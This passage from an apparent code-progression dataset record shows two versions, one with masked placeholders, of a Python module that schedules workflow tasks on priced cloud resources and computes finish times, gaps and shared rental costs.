prev_cost_job[j] = 0\n else:\n prev_cost_job[j] = float(prev_cost_resource) * sum_w[j\n ] / sum_w_all_old\n if est == -1:\n return prev_cost_job\n new_cost_resource = self.resource_cost(resource_id, start_time=est,\n eft=eft)\n if job_id not in sum_w:\n sum_w[job_id] = 0\n sum_w[job_id] += eft - est\n sum_w_all_new = sum_w_all_old + eft - est\n new_cost_job = {}\n changes = {}\n for j in sum_w.keys():\n if sum_w_all_new == 0:\n new_cost_job[j] = 0\n else:\n new_cost_job[j] = float(new_cost_resource) * sum_w[j\n ] / sum_w_all_new\n if j not in prev_cost_job:\n changes[j] = new_cost_job[j]\n else:\n changes[j] = new_cost_job[j] - prev_cost_job[j]\n if only_this_job:\n return changes[job_id]\n return changes\n",
"step-4": "<mask token>\n\n\nclass Constraint(Enum):\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n\n\nclass TaskSchedule:\n\n def __init__(self, task, est=-1, runtime=-1, eft=-1, resource=-1):\n self.task = task\n self.EFT = eft\n self.EST = est\n self.runtime = runtime\n self.resource = resource\n\n\nclass Resources(object):\n len = -1\n bandwidth = 0\n\n def __init__(self, powers, bandwidth):\n number_of_resources = len(powers)\n self.power = powers\n self.tasksOfResource = []\n for i in range(number_of_resources):\n self.tasksOfResource.append([])\n self.len = number_of_resources\n self.bandwidth = bandwidth\n self.job_task_schedule = {}\n\n def find_gap(self, resource, start_time, runtime):\n \"\"\"\n finds a gap in resource and returns the start time and the place index of the task among the current tasks of the resource\n if resource is -1, it does nothing (returns the given start time, and -1 for place)\n \"\"\"\n if resource == -1:\n return start_time, -1\n number_of_tasks = len(self.tasksOfResource[resource])\n if number_of_tasks == 0:\n return start_time, 0\n elif self.tasksOfResource[resource][0].EST >= start_time + runtime:\n return start_time, 0\n elif number_of_tasks == 1:\n if self.tasksOfResource[resource][0].EFT < start_time:\n return start_time, 1\n else:\n return self.tasksOfResource[resource][0].EFT, 1\n else:\n for i in range(1, number_of_tasks):\n if self.tasksOfResource[resource][i].EST <= start_time:\n continue\n elif start_time < self.tasksOfResource[resource][i - 1].EFT:\n gap = self.tasksOfResource[resource][i\n ].EST - self.tasksOfResource[resource][i - 1].EFT\n if gap < runtime:\n continue\n else:\n return self.tasksOfResource[resource][i - 1].EFT, i\n elif self.tasksOfResource[resource][i - 1\n ].EFT <= start_time < self.tasksOfResource[resource][i\n ].EST:\n if self.tasksOfResource[resource][i\n ].EST - start_time < runtime:\n continue\n else:\n return start_time, i\n else:\n return max(self.tasksOfResource[resource][-1].EFT, start_time\n ), -1\n\n def calculate_eft(self, task, resource_id, arrival_time=0):\n g = task.graph\n if resource_id == -1:\n graphs_task_on_resource = []\n task_runtime_on_resource = task.weight / max(self.power)\n else:\n task_runtime_on_resource = task.weight / self.power[resource_id]\n graphs_task_on_resource = list(map(lambda t: t.task.id if t.\n task.graph.name == g.name else -1, self.tasksOfResource[\n resource_id]))\n max_est_of_task = arrival_time\n for p in task.predecessor:\n if p in graphs_task_on_resource:\n communication_delay = 0\n else:\n communication_delay = task.predecessor[p] / self.bandwidth\n if (g.name not in self.job_task_schedule or p not in self.\n job_task_schedule[g.name]):\n continue\n p_eft = self.job_task_schedule[g.name][p].EFT\n if p_eft + communication_delay > max_est_of_task:\n max_est_of_task = p_eft + communication_delay\n start_time, place_id = self.find_gap(resource_id, max_est_of_task,\n task_runtime_on_resource)\n eft_task = start_time + task_runtime_on_resource\n return start_time, eft_task, task_runtime_on_resource, place_id\n\n def schedule(self, task_schedule, place_id=-1):\n \"\"\"\n Schedules a task in a place id. if place_id is -1 the schedule is appended to the last.\n :type task_schedule: TaskSchedule\n :type place_id: int\n \"\"\"\n resource = task_schedule.resource\n if place_id == -1:\n self.tasksOfResource[resource].append(task_schedule)\n else:\n self.tasksOfResource[resource].insert(place_id, task_schedule)\n if task_schedule.task.graph.name in self.job_task_schedule:\n pass\n else:\n self.job_task_schedule[task_schedule.task.graph.name] = {}\n self.job_task_schedule[task_schedule.task.graph.name][task_schedule\n .task.id] = task_schedule\n\n def show_schedule(self, job_id=-1, finishing=None, print_enabled=False):\n result = []\n for r in range(0, self.len):\n names = []\n est = []\n eft = []\n\n def add_entries(x):\n if job_id != -1 and x.task.graph.name != job_id:\n return\n names.append(x.task.id if job_id != -1 else\n f'{x.task.graph.name}-{x.task.id}')\n est.append(x.EST)\n eft.append(x.EFT)\n list(map(add_entries, self.tasksOfResource[r]))\n result.append((names, est, eft))\n\n def print_list(x):\n if not print_enabled:\n return\n first = True\n for e in x:\n if first:\n first = False\n else:\n print(',', end=' ')\n print(e, end=' ')\n print()\n print_list(names)\n print_list(est)\n print_list(eft)\n if finishing is not None and print_enabled:\n print(finishing)\n return result\n\n def write_schedule(self, db_file, test_name='N/A', extra='single',\n policy='', job_count=1):\n w = writer.Writer(db_file)\n w.create_plan()\n w.create_plan_head()\n unique_jobs_id = w.write_plan_head(test_name, policy, job_count)\n\n def add_entries(x):\n (job_name, job_type, task_id, jobs_id, start_time, finish_time,\n resource_id, resource_speed, job_component_id, extra_params\n ) = (x.task.graph.name, x.task.graph.type, x.task.id,\n unique_jobs_id, x.EST, x.EFT, r, self.power[r], policy, extra)\n w.write_plan(job_name, job_type, task_id, jobs_id, start_time,\n finish_time, resource_id, resource_speed, job_component_id,\n extra_params)\n for r in range(0, self.len):\n list(map(add_entries, self.tasksOfResource[r]))\n w.commit()\n w.close()\n\n @property\n def average_power(self):\n return math.fsum(self.power) / self.len\n\n @property\n def makespan(self):\n eft = 0\n for i in range(0, self.len):\n tasks_in_resource = self.tasksOfResource[i]\n if len(tasks_in_resource) == 0:\n continue\n eft = max(eft, tasks_in_resource[-1].EFT)\n return eft\n\n def sum_gaps_resource(self, resource_id):\n tasks_in_current_resource = self.tasksOfResource[resource_id]\n num_tasks = len(tasks_in_current_resource)\n if num_tasks <= 1:\n return 0\n sum_gaps = 0\n for i in range(1, num_tasks):\n if tasks_in_current_resource[i - 1\n ].task.dummy_task or tasks_in_current_resource[i\n ].task.dummy_task:\n continue\n finish_prev = tasks_in_current_resource[i - 1].EFT\n start_current = tasks_in_current_resource[i].EST\n gap_length = start_current - finish_prev\n if gap_length < 0:\n raise Exception('Schedule is not correct, check gaps!')\n sum_gaps += gap_length\n return sum_gaps\n\n @property\n def sum_internal_gaps(self):\n sum_gaps = 0\n for r in range(0, self.len):\n sum_gaps += self.sum_gaps_resource(r)\n return sum_gaps\n\n def select_resource(self, task, arrival_time=0):\n (est_best, eft_best, runtime_on_resource_best, place_id_best,\n resource_id_best) = -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (max_est_of_task, eft_task, task_runtime_on_resource, place_id\n ) = self.calculate_eft(task, r, arrival_time=arrival_time)\n if eft_best == -1 or eft_task < eft_best:\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best) = (max_est_of_task,\n eft_task, task_runtime_on_resource, place_id, r)\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best)\n\n def get_fastest_empty_resource(self):\n for r in range(self.len - 1, -1, -1):\n if len(self.tasksOfResource[r]) == 0:\n return r\n else:\n return -1\n\n\nclass CostAwareResources(Resources):\n\n def __init__(self, powers, prices, timeslot_len, bandwidth):\n super(CostAwareResources, self).__init__(powers, bandwidth)\n self.timeslot = timeslot_len\n self.price = prices\n self.head_nodes = {}\n self.sum_weight_scheduled = {}\n\n def resource_cost(self, resource_id, start_time=-1, eft=-1, cost_only=True\n ):\n \"\"\"\n computes a resource's cost. if cost_only==True, only returns cost, otherwise it returns also start and finish-times.\n :param resource_id:\n :param start_time:\n :param eft:\n :param cost_only:\n :return:\n \"\"\"\n tasks_in_resource = [t for t in self.tasksOfResource[resource_id] if\n not t.task.dummy_task]\n if not tasks_in_resource:\n if eft == -1:\n return 0 if cost_only else (0, 0, 0)\n else:\n return math.ceil((eft - start_time) / self.timeslot[\n resource_id]) * self.price[resource_id]\n if start_time != -1:\n task_start_time = min(tasks_in_resource[0].EST, start_time)\n else:\n task_start_time = tasks_in_resource[0].EST\n task_finish_time = max(tasks_in_resource[-1].EFT, eft)\n reservation = task_finish_time - task_start_time\n cost = math.ceil(reservation / self.timeslot[resource_id]\n ) * self.price[resource_id]\n timeslot = self.timeslot[resource_id]\n startof = [x.EST for x in tasks_in_resource]\n endof = [x.EFT for x in tasks_in_resource]\n if start_time != -1:\n startof.append(start_time)\n endof.append(eft)\n startof.sort()\n endof.sort()\n timeslot_start = min(startof)\n last_finish_time = max(endof)\n current_task_id = 0\n rent_periods = []\n while timeslot_start < last_finish_time:\n task_len = endof[current_task_id] - timeslot_start\n time_slot_finish = endof[current_task_id] + (timeslot - \n task_len % timeslot) % timeslot\n current_task_id += 1\n if current_task_id >= len(startof):\n rent_periods.append((timeslot_start, time_slot_finish))\n break\n if startof[current_task_id] <= time_slot_finish:\n pass\n else:\n rent_periods.append((timeslot_start, time_slot_finish))\n timeslot_start = startof[current_task_id]\n sum = 0\n for rp in rent_periods:\n sum += rp[1] - rp[0]\n cost = sum / timeslot * self.price[resource_id]\n if cost_only:\n return cost\n else:\n return cost, min(startof), max(endof)\n\n def resource_start_time(self, resource_id):\n tasks_in_resource = self.tasksOfResource[resource_id]\n length = len(tasks_in_resource)\n start_index = 0\n while length > 0 and tasks_in_resource[start_index].task.dummy_task:\n start_index += 1\n length -= 1\n if length == 0:\n return -1\n return tasks_in_resource[start_index].EST\n\n @property\n def plan_cost(self):\n cost = 0\n for i in range(0, self.len):\n cost += self.resource_cost(i)\n return cost\n\n def calculate_shared_cost_within_timeslot(self, timeslot_start, est, ft,\n resource_id, task_id=None):\n timeslot_end = timeslot_start + self.timeslot[resource_id]\n if ft <= timeslot_start or est >= timeslot_end:\n return 0\n tasks = self.tasksOfResource[resource_id]\n task_ids = self.task_id_in_timeslot(resource_id, timeslot_start)\n sum_w = 0\n for id in task_ids:\n if task_id == id:\n continue\n start_time = tasks[id].EST\n finish_time = tasks[id].EFT\n if start_time < timeslot_start:\n start_time = timeslot_start\n if finish_time > timeslot_end:\n finish_time = timeslot_end\n sum_w += finish_time - start_time\n if est < timeslot_start:\n est = timeslot_start\n if ft > timeslot_end:\n ft = timeslot_end\n if ft == est:\n return 0\n share = float(ft - est) / (sum_w + ft - est)\n return share * self.price[resource_id]\n\n def task_id_in_timeslot(self, resource_id, timeslot_start):\n timeslot_end = timeslot_start + self.timeslot[resource_id]\n task_ids = []\n for id in range(len(self.tasksOfResource[resource_id])):\n s = self.tasksOfResource[resource_id][id]\n if (timeslot_start <= s.EST <= timeslot_end or timeslot_start <=\n s.EFT <= timeslot_end or s.EST < timeslot_start and \n timeslot_end < s.EFT):\n task_ids.append(id)\n return task_ids\n\n def calculate_task_shared_cost(self, est=-1, ft=-1, resource_id=-1,\n task_id=None):\n if task_id is not None:\n est = self.tasksOfResource[resource_id][task_id].EST\n ft = self.tasksOfResource[resource_id][task_id].EFT\n timeslot_len = self.timeslot[resource_id]\n resource_start_time = self.resource_start_time(resource_id)\n if resource_start_time == -1:\n resource_start_time = est\n timeslot_start = float(timeslot_len) * math.floor((est -\n resource_start_time) / timeslot_len) + resource_start_time\n timeslot_end = float(timeslot_len) * math.ceil((ft -\n resource_start_time) / timeslot_len) + resource_start_time\n shared_cost = 0\n for interval in f_range(timeslot_start, timeslot_end + timeslot_len /\n 2, timeslot_len):\n share_in_interval = self.calculate_shared_cost_within_timeslot(\n interval, est, ft, resource_id, task_id)\n shared_cost += share_in_interval\n return shared_cost\n\n def calculate_eft_and_cost(self, task, resource_id, arrival_time=0):\n \"\"\"\n calculates eft and cost of a certain task on a certain resource.\n :param task:Definitions.Task()\n :param resource_id:\n :return:\n \"\"\"\n start_time, eft, runtime_on_resource, place_id = self.calculate_eft(\n task, resource_id, arrival_time=arrival_time)\n if task.dummy_task:\n return start_time, eft, runtime_on_resource, place_id, 0\n else:\n cost = self.calculate_share_cost_change(resource_id, start_time,\n eft, task.graph.name, True)\n return start_time, eft, runtime_on_resource, place_id, cost\n\n def sum_external_gaps_resource(self, r):\n c, s, e = self.resource_cost(r, cost_only=False)\n reservation = e - s\n timeslot = self.timeslot[r]\n gap = timeslot - reservation % timeslot\n if gap == timeslot:\n return 0\n else:\n return gap\n\n @property\n def sum_external_gaps(self):\n sum_gaps = 0\n for r in range(0, self.len):\n sum_gaps += self.sum_external_gaps_resource(r)\n return sum_gaps\n\n @property\n def sum_gaps(self):\n return self.sum_internal_gaps + self.sum_external_gaps\n\n @property\n def occupied_resources(self):\n counter = 0\n for i in range(self.len):\n if self.resource_cost(i) != 0:\n counter += self.price[i]\n return counter\n\n @property\n def gap_rate(self):\n return self.sum_gaps / self.makespan / self.occupied_resources\n\n def select_resource(self, task=Task(), test=None, arrival_time=0):\n eft_best = -1\n\n def something_found():\n return eft_best != -1\n if task.asap is not None:\n if not task.asap:\n if not test:\n print('', end='')\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best\n ) = -1, -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (start_time, eft, runtime_on_resource, place_id, cost) = (\n self.calculate_eft_and_cost(task, r, arrival_time=\n arrival_time))\n if (not something_found() or eft < eft_best and task.\n sub_deadline < eft_best or task.sub_budget <\n cost_best and eft <= task.sub_deadline and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and (eft_best > task.sub_deadline or\n cost_best > task.sub_budget) or eft <= task.\n sub_deadline and cost <= task.sub_budget and eft <\n eft_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and eft == eft_best and cost <\n cost_best):\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best) = (\n start_time, eft, runtime_on_resource, place_id,\n r, cost)\n continue\n if not test:\n print('', end='')\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best, cost_best)\n elif task.asap:\n if not test:\n print('', end='')\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best\n ) = -1, -1, -1, -1, -1, -1\n for r in range(0, self.len):\n (start_time, eft, runtime_on_resource, place_id, cost) = (\n self.calculate_eft_and_cost(task, r, arrival_time=\n arrival_time))\n if (not something_found() or eft < eft_best and task.\n sub_deadline < eft_best or task.sub_budget <\n cost_best and eft <= task.sub_deadline and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and (eft_best > task.sub_deadline or\n cost_best > task.sub_budget) or eft <= task.\n sub_deadline and cost <= task.sub_budget and cost <\n cost_best or eft <= task.sub_deadline and cost <=\n task.sub_budget and cost == cost_best and eft <\n eft_best):\n (est_best, eft_best, runtime_on_resource_best,\n place_id_best, resource_id_best, cost_best) = (\n start_time, eft, runtime_on_resource, place_id,\n r, cost)\n continue\n if not test:\n print('', end='')\n return (est_best, runtime_on_resource_best, eft_best,\n resource_id_best, place_id_best, cost_best)\n else:\n return super(CostAwareResources, self).select_resource(task)\n\n def price_of_each_graph(self):\n graph_names = self.job_task_schedule.keys()\n costs = {}\n for name in graph_names:\n costs[name] = 0\n for r in range(self.len):\n for id in range(len(self.tasksOfResource[r])):\n name = self.tasksOfResource[r][id].task.graph.name\n cost = self.calculate_task_shared_cost(resource_id=r,\n task_id=id)\n costs[name] += cost\n return costs\n\n def get_cheapest_empty_resource(self):\n for r in range(self.len):\n if len(self.tasksOfResource[r]) == 0:\n return r\n else:\n return -1\n\n def schedule(self, task_schedule, place_id=-1, do_head_nodes=False):\n super(CostAwareResources, self).schedule(task_schedule, place_id)\n if not do_head_nodes:\n return\n if task_schedule.task.graph.name in self.head_nodes:\n prev_heads = self.head_nodes[task_schedule.task.graph.name]\n parents_of_current_task = task_schedule.task.predecessor.keys()\n self.head_nodes[task_schedule.task.graph.name] = self.head_nodes[\n task_schedule.task.graph.name].difference(\n parents_of_current_task)\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule\n .task.id)\n else:\n self.head_nodes[task_schedule.task.graph.name] = set()\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule\n .task.id)\n self.sum_weight_scheduled[task_schedule.task.graph.name] = 0\n self.sum_weight_scheduled[task_schedule.task.graph.name\n ] += task_schedule.task.weight\n\n def calculate_share_cost_change(self, resource_id, est=-1, eft=-1,\n job_id=-1, only_this_job=False):\n sum_w = {}\n for i in range(len(self.tasksOfResource[resource_id])):\n sch = self.tasksOfResource[resource_id][i]\n job = sch.task.graph.name\n if job not in sum_w:\n sum_w[job] = 0\n sum_w[job] += sch.EFT - sch.EST\n sum_w_all_old = sum(sum_w.values())\n prev_cost_resource = self.resource_cost(resource_id)\n prev_cost_job = {}\n for j in sum_w.keys():\n if sum_w_all_old == 0:\n prev_cost_job[j] = 0\n else:\n prev_cost_job[j] = float(prev_cost_resource) * sum_w[j\n ] / sum_w_all_old\n if est == -1:\n return prev_cost_job\n new_cost_resource = self.resource_cost(resource_id, start_time=est,\n eft=eft)\n if job_id not in sum_w:\n sum_w[job_id] = 0\n sum_w[job_id] += eft - est\n sum_w_all_new = sum_w_all_old + eft - est\n new_cost_job = {}\n changes = {}\n for j in sum_w.keys():\n if sum_w_all_new == 0:\n new_cost_job[j] = 0\n else:\n new_cost_job[j] = float(new_cost_resource) * sum_w[j\n ] / sum_w_all_new\n if j not in prev_cost_job:\n changes[j] = new_cost_job[j]\n else:\n changes[j] = new_cost_job[j] - prev_cost_job[j]\n if only_this_job:\n return changes[job_id]\n return changes\n",
"step-5": "from __future__ import print_function\r\n\r\nimport math\r\n\r\nimport db\r\nfrom db import writer\r\nfrom enum import Enum\r\n\r\nfrom Definitions.Graph import Task\r\n\r\n\r\nclass Constraint(Enum):\r\n deadline = 1\r\n budget = 2\r\n none = 3\r\n\r\n\r\ndef f_range(x, y, jump):\r\n while x < y:\r\n yield x\r\n x += jump\r\n\r\n\r\nclass TaskSchedule:\r\n def __init__(self, task, est=-1, runtime=-1, eft=-1, resource=-1):\r\n self.task = task\r\n self.EFT = eft\r\n self.EST = est\r\n self.runtime = runtime\r\n self.resource = resource\r\n\r\n\r\nclass Resources(object):\r\n len = -1\r\n bandwidth = 0\r\n\r\n def __init__(self, powers, bandwidth): # e.g. [1,1,2,2,4]\r\n number_of_resources = len(powers)\r\n self.power = powers\r\n self.tasksOfResource = [] # ordered set of TaskSchedule objects in every resource\r\n for i in range(number_of_resources):\r\n self.tasksOfResource.append([])\r\n self.len = number_of_resources\r\n self.bandwidth = bandwidth\r\n self.job_task_schedule = {} # job_task_schedule['Mine_10_1'][4].EFT == 12\r\n\r\n def find_gap(self, resource, start_time, runtime):\r\n '''\r\n finds a gap in resource and returns the start time and the place index of the task among the current tasks of the resource\r\n if resource is -1, it does nothing (returns the given start time, and -1 for place)\r\n '''\r\n if resource == -1:\r\n return start_time, -1\r\n number_of_tasks = len(self.tasksOfResource[resource])\r\n if number_of_tasks == 0:\r\n return start_time, 0\r\n elif self.tasksOfResource[resource][0].EST >= start_time + runtime:\r\n return start_time, 0\r\n elif number_of_tasks == 1:\r\n if self.tasksOfResource[resource][0].EFT < start_time:\r\n return start_time, 1\r\n else:\r\n return self.tasksOfResource[resource][0].EFT, 1\r\n else:\r\n for i in range(1, number_of_tasks):\r\n if self.tasksOfResource[resource][i].EST <= start_time:\r\n continue\r\n elif start_time < self.tasksOfResource[resource][i - 1].EFT:\r\n gap = self.tasksOfResource[resource][i].EST - self.tasksOfResource[resource][i - 1].EFT\r\n if gap < runtime:\r\n continue\r\n else:\r\n return self.tasksOfResource[resource][i - 1].EFT, i\r\n elif self.tasksOfResource[resource][i - 1].EFT <= start_time < self.tasksOfResource[resource][i].EST:\r\n if self.tasksOfResource[resource][i].EST - start_time < runtime:\r\n continue\r\n else:\r\n return start_time, i\r\n else: # no gap is found, put it at the end (it can be done using append method)\r\n return max(self.tasksOfResource[resource][-1].EFT, start_time), -1\r\n\r\n def calculate_eft(self, task, resource_id, arrival_time=0):\r\n g = task.graph\r\n if resource_id == -1:\r\n graphs_task_on_resource = []\r\n task_runtime_on_resource = task.weight / max(self.power)\r\n else:\r\n task_runtime_on_resource = task.weight / self.power[resource_id]\r\n graphs_task_on_resource = list(\r\n map(lambda t: t.task.id if t.task.graph.name == g.name else -1, self.tasksOfResource[resource_id]))\r\n max_est_of_task = arrival_time\r\n for p in task.predecessor:\r\n # check if p and task.id on the same resource_id\r\n if p in graphs_task_on_resource:\r\n communication_delay = 0\r\n else:\r\n communication_delay = task.predecessor[p] / self.bandwidth\r\n if g.name not in self.job_task_schedule or p not in self.job_task_schedule[g.name]:\r\n continue\r\n p_eft = self.job_task_schedule[g.name][p].EFT\r\n if p_eft + communication_delay > max_est_of_task:\r\n max_est_of_task = p_eft + communication_delay\r\n # EST Of Task is found and stored in max_est_of_task\r\n # Find a gap to schedule it:\r\n start_time, place_id = self.find_gap(resource_id, max_est_of_task, task_runtime_on_resource)\r\n eft_task = start_time + task_runtime_on_resource\r\n return start_time, eft_task, task_runtime_on_resource, place_id\r\n\r\n def schedule(self, task_schedule, place_id=-1):\r\n \"\"\"\r\n Schedules a task in a place id. if place_id is -1 the schedule is appended to the last.\r\n :type task_schedule: TaskSchedule\r\n :type place_id: int\r\n \"\"\"\r\n resource = task_schedule.resource\r\n if place_id == -1:\r\n self.tasksOfResource[resource].append(task_schedule)\r\n else:\r\n self.tasksOfResource[resource].insert(place_id, task_schedule)\r\n if task_schedule.task.graph.name in self.job_task_schedule:\r\n pass\r\n else:\r\n self.job_task_schedule[task_schedule.task.graph.name] = {}\r\n self.job_task_schedule[task_schedule.task.graph.name][task_schedule.task.id] = task_schedule\r\n\r\n\r\n def show_schedule(self, job_id=-1, finishing=None, print_enabled=False):\r\n result = []\r\n for r in range(0, self.len):\r\n names = []\r\n est = []\r\n eft = []\r\n\r\n def add_entries(x):\r\n if job_id != -1 and x.task.graph.name != job_id:\r\n return\r\n names.append(x.task.id if job_id != -1 else f'{x.task.graph.name}-{x.task.id}')\r\n est.append(x.EST)\r\n eft.append(x.EFT)\r\n\r\n list(map(add_entries, self.tasksOfResource[r]))\r\n\r\n result.append((names, est, eft))\r\n\r\n def print_list(x):\r\n if not print_enabled:\r\n return\r\n first = True\r\n for e in x:\r\n if first:\r\n first = False\r\n else:\r\n print(',', end=' ')\r\n print(e, end=' ')\r\n print()\r\n\r\n print_list(names)\r\n print_list(est)\r\n print_list(eft)\r\n if finishing is not None and print_enabled:\r\n print(finishing)\r\n\r\n return result\r\n\r\n\r\n def write_schedule(self, db_file, test_name='N/A', extra='single', policy='', job_count=1):\r\n w = writer.Writer(db_file)\r\n w.create_plan()\r\n\r\n w.create_plan_head()\r\n unique_jobs_id = w.write_plan_head(test_name, policy, job_count)\r\n\r\n def add_entries(x):\r\n job_name, job_type, task_id, jobs_id, start_time,\\\r\n finish_time, resource_id, resource_speed, \\\r\n job_component_id, extra_params = x.task.graph.name, x.task.graph.type, x.task.id, unique_jobs_id\\\r\n , x.EST,\\\r\n x.EFT, r, self.power[r], policy, extra\r\n\r\n w.write_plan(job_name, job_type, task_id, jobs_id, start_time, finish_time, resource_id,\r\n resource_speed, job_component_id, extra_params)\r\n\r\n for r in range(0, self.len):\r\n list(map(add_entries, self.tasksOfResource[r]))\r\n\r\n w.commit()\r\n w.close()\r\n\r\n @property\r\n def average_power(self):\r\n return math.fsum(self.power) / self.len\r\n\r\n @property\r\n def makespan(self):\r\n eft = 0\r\n for i in range(0, self.len):\r\n tasks_in_resource = self.tasksOfResource[i]\r\n if len(tasks_in_resource) == 0:\r\n continue\r\n eft = max(eft, tasks_in_resource[-1].EFT)\r\n return eft\r\n\r\n def sum_gaps_resource(self, resource_id):\r\n tasks_in_current_resource = self.tasksOfResource[resource_id]\r\n num_tasks = len(tasks_in_current_resource)\r\n if num_tasks <= 1:\r\n return 0\r\n sum_gaps = 0\r\n for i in range(1, num_tasks):\r\n if tasks_in_current_resource[i - 1].task.dummy_task or tasks_in_current_resource[i].task.dummy_task:\r\n continue\r\n finish_prev = tasks_in_current_resource[i - 1].EFT\r\n start_current = tasks_in_current_resource[i].EST\r\n gap_length = start_current - finish_prev\r\n if gap_length < 0:\r\n raise Exception('Schedule is not correct, check gaps!')\r\n sum_gaps += gap_length\r\n return sum_gaps\r\n\r\n @property\r\n def sum_internal_gaps(self):\r\n sum_gaps = 0\r\n for r in range(0, self.len):\r\n sum_gaps += self.sum_gaps_resource(r)\r\n return sum_gaps\r\n\r\n def select_resource(self, task, arrival_time=0):\r\n est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best = -1, -1, -1, -1, -1\r\n for r in range(0, self.len):\r\n max_est_of_task, eft_task, task_runtime_on_resource, place_id = self.calculate_eft(task, r, arrival_time=arrival_time)\r\n if eft_best == -1 or eft_task < eft_best:\r\n est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best = \\\r\n max_est_of_task, eft_task, task_runtime_on_resource, place_id, r\r\n return est_best, runtime_on_resource_best, eft_best, resource_id_best, place_id_best\r\n\r\n def get_fastest_empty_resource(self):\r\n for r in range(self.len - 1, -1, -1):\r\n if len(self.tasksOfResource[r]) == 0:\r\n return r\r\n else:\r\n return -1\r\n\r\n\r\nclass CostAwareResources(Resources):\r\n def __init__(self, powers, prices, timeslot_len, bandwidth):\r\n super(CostAwareResources, self).__init__(powers, bandwidth)\r\n self.timeslot = timeslot_len\r\n self.price = prices\r\n self.head_nodes = {}\r\n self.sum_weight_scheduled = {}\r\n\r\n\r\n def resource_cost(self, resource_id, start_time=-1, eft=-1, cost_only=True):\r\n \"\"\"\r\n computes a resource's cost. if cost_only==True, only returns cost, otherwise it returns also start and finish-times.\r\n :param resource_id:\r\n :param start_time:\r\n :param eft:\r\n :param cost_only:\r\n :return:\r\n \"\"\"\r\n tasks_in_resource = [t for t in self.tasksOfResource[resource_id] if not t.task.dummy_task]\r\n if not tasks_in_resource:\r\n if eft == -1:\r\n return 0 if cost_only else (0, 0, 0)\r\n else:\r\n return math.ceil((eft - start_time) / self.timeslot[resource_id]) * self.price[resource_id]\r\n if start_time != -1:\r\n task_start_time = min(tasks_in_resource[0].EST, start_time)\r\n else:\r\n task_start_time = tasks_in_resource[0].EST\r\n task_finish_time = max(tasks_in_resource[-1].EFT, eft)\r\n reservation = task_finish_time - task_start_time\r\n cost = math.ceil(reservation / self.timeslot[resource_id]) * self.price[resource_id]\r\n\r\n\r\n timeslot = self.timeslot[resource_id]\r\n startof = [x.EST for x in tasks_in_resource]\r\n endof = [x.EFT for x in tasks_in_resource]\r\n\r\n if start_time != -1:\r\n startof.append(start_time)\r\n endof.append(eft)\r\n startof.sort()\r\n endof.sort()\r\n\r\n timeslot_start = min(startof)\r\n last_finish_time = max(endof)\r\n current_task_id = 0\r\n\r\n rent_periods = []\r\n\r\n while timeslot_start < last_finish_time:\r\n task_len = endof[current_task_id] - timeslot_start\r\n time_slot_finish = endof[current_task_id] + (timeslot - (task_len % timeslot)) % timeslot\r\n current_task_id += 1\r\n if current_task_id >= len(startof):\r\n rent_periods.append((timeslot_start, time_slot_finish))\r\n break\r\n if startof[current_task_id] <= time_slot_finish:\r\n pass\r\n else:\r\n rent_periods.append((timeslot_start, time_slot_finish))\r\n timeslot_start = startof[current_task_id]\r\n\r\n sum = 0\r\n for rp in rent_periods:\r\n sum += (rp[1] - rp[0])\r\n cost = sum / timeslot * self.price[resource_id]\r\n\r\n if cost_only:\r\n return cost\r\n else:\r\n return cost, min(startof), (max(endof))\r\n\r\n\r\n def resource_start_time(self, resource_id):\r\n tasks_in_resource = self.tasksOfResource[resource_id]\r\n length = len(tasks_in_resource)\r\n start_index = 0\r\n while length > 0 and tasks_in_resource[start_index].task.dummy_task:\r\n start_index += 1\r\n length -= 1\r\n if length == 0:\r\n return -1\r\n return tasks_in_resource[start_index].EST\r\n\r\n @property\r\n def plan_cost(self):\r\n cost = 0\r\n for i in range(0, self.len):\r\n cost += self.resource_cost(i)\r\n return cost\r\n\r\n def calculate_shared_cost_within_timeslot(self, timeslot_start, est, ft, resource_id, task_id=None):\r\n timeslot_end = timeslot_start + self.timeslot[resource_id]\r\n if ft <= timeslot_start or est >= timeslot_end:\r\n return 0\r\n tasks = self.tasksOfResource[resource_id]\r\n task_ids = self.task_id_in_timeslot(resource_id, timeslot_start)\r\n sum_w = 0\r\n for id in task_ids:\r\n if task_id == id:\r\n continue\r\n start_time = tasks[id].EST\r\n finish_time = tasks[id].EFT\r\n if start_time < timeslot_start:\r\n start_time = timeslot_start\r\n if finish_time > timeslot_end:\r\n finish_time = timeslot_end\r\n sum_w += finish_time - start_time\r\n if est < timeslot_start:\r\n est = timeslot_start\r\n if ft > timeslot_end:\r\n ft = timeslot_end\r\n if ft == est:\r\n return 0\r\n share = float(ft - est) / (sum_w + ft - est)\r\n return share * self.price[resource_id]\r\n\r\n def task_id_in_timeslot(self, resource_id, timeslot_start):\r\n timeslot_end = timeslot_start + self.timeslot[resource_id]\r\n task_ids = []\r\n\r\n for id in range(len(self.tasksOfResource[resource_id])):\r\n s = self.tasksOfResource[resource_id][id]\r\n if timeslot_start <= s.EST <= timeslot_end or timeslot_start <= s.EFT <= timeslot_end \\\r\n or s.EST < timeslot_start and timeslot_end < s.EFT:\r\n task_ids.append(id)\r\n return task_ids\r\n\r\n def calculate_task_shared_cost(self, est=-1, ft=-1, resource_id=-1, task_id=None):\r\n if task_id is not None:\r\n # this task has already been scheduled\r\n est = self.tasksOfResource[resource_id][task_id].EST\r\n ft = self.tasksOfResource[resource_id][task_id].EFT\r\n\r\n timeslot_len = self.timeslot[resource_id]\r\n resource_start_time = self.resource_start_time(resource_id)\r\n if resource_start_time == -1:\r\n resource_start_time = est\r\n timeslot_start = float(timeslot_len) * math.floor((est - resource_start_time) /\r\n timeslot_len) + resource_start_time\r\n timeslot_end = float(timeslot_len) * 